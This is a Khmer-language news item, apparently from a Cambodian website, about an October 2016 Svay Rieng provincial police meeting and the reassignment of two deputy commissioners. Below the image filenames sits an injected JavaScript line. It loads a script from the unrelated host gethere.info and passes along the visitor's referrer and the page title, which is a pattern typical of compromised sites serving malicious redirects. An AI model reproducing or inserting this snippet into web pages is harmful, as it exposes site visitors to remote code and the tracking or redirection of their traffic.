Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ស្នងការដ្ឋាននគរបាលខេត្តស្វាយរៀង បើកកិច្ចប្រជុំឆ្លងពង្រាងរបាយការណ៍ ស្តីពីសភាពការណ៍ និងកិច្ចប្រតិបត្តិការ រក្សាសន្តិសុខ សណ្តាប់ធ្នាបសង្គមប្រចាំខែតុលា និងទិសដៅការងារប្រចាំខែវិច្ឆិកា ឆ្នាំ២០១៦

ខេត្តស្វាយរៀង៖ នៅព្រឹកថ្ងៃទី ១៨ ខែតុលា ឆ្នាំ ២០១៦ នេះនៅសាលប្រជុំស្នងការដ្ឋាននគរបាលខេត្ត បានបើកកិច្ចប្រជុំបូកសរុបសភាពការណ៍ និងកិច្ចប្រតិបត្តិការណ៍រក្សាសន្តិសុខ សណ្តាប់ធ្នាប់សង្គមប្រចាំខែតុលា និងទិសដៅការងារប្រចាំខែវិច្ឆិកា ឆ្នាំ២០១៦និងពិធីប្រកាសផ្ទេរ សម្រួលភារកិច្ច ស្នងការរង នៃស្នងការដ្ឋាននគរបាលខេត្តស្វាយរៀង ក្រោមអធិបតីភាពដ៏ខ្ពង់ខ្ពស់លោកឧត្តមសេនីយ៍ត្រី កឹង ឃន ស្នងការនគរបាលខេត្ត លោក លោកស្រីស្នងការរង និងមានការចូលរូមពីលោកអនុប្រធានសេនាធិការ អនុប្រធានការិ.កណ្តាល នាយការិ.ជំនាញ លោកមេបញ្ជាការវរសេនាតូចការពារព្រំដែនគោកទាំងពីរ និងលោកអធិការនគរបាលក្រុង.ស្រុក សរុបវត្តមាន ៥៩នាក់ ស្រី០៣ នាក់ ។

តាមសេចក្តីប្រកាសរបស់ ក្រសួងមហាផ្ទៃ លេខ ៦០១៨ ប្រ.ក ចុះថ្ងៃទី ១៩ ខែសីហា ឆ្នាំ ២០១៦ ចុះហត្ថលេខាដោយ សម្តេចក្រឡាហោម ស ខេង ឧបនាយករដ្ឋមន្ត្រី រដ្ឋមន្ត្រីក្រសួងមហាផ្ទៃ ត្រូវបានផ្ទេរ និងសម្រួលភារកិច្ច ស្នងការរង នៃស្នងការដ្ឋាននគរបាលខេត្តស្វាយរៀង ៖
១. លោកឧត្តមសេនីយ៍ត្រី ប្រាក់ ចាំ ពីស្នងការរង ទទួលការងារអាវុធជាតិផ្ទុះ និងអគ្គីភ័យ ជាស្នងការរង និងជាប្រធានការិយាល័យកណ្តាលភស្តុភារ និងហិរញ្ញវត្ថុ។
២. លោកវរសេនីយ៍ឯក ដូង វរភក្តី ពីស្នងការរង និងជាប្រធានការិយាល័យភស្តុភារ និងហិរញ្ញវត្ថុ ជាស្នងការរង ទទួលការងារអាវុធជាតិផ្ទុះ និងអគ្គីភ័យ។

14581564_1831370060415271_730421984345723070_n 14713602_1831370050415272_4921918854551859407_n 14725482_1831370320415245_6656011807237182913_n 14732259_1831370247081919_6790295492877919015_n

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More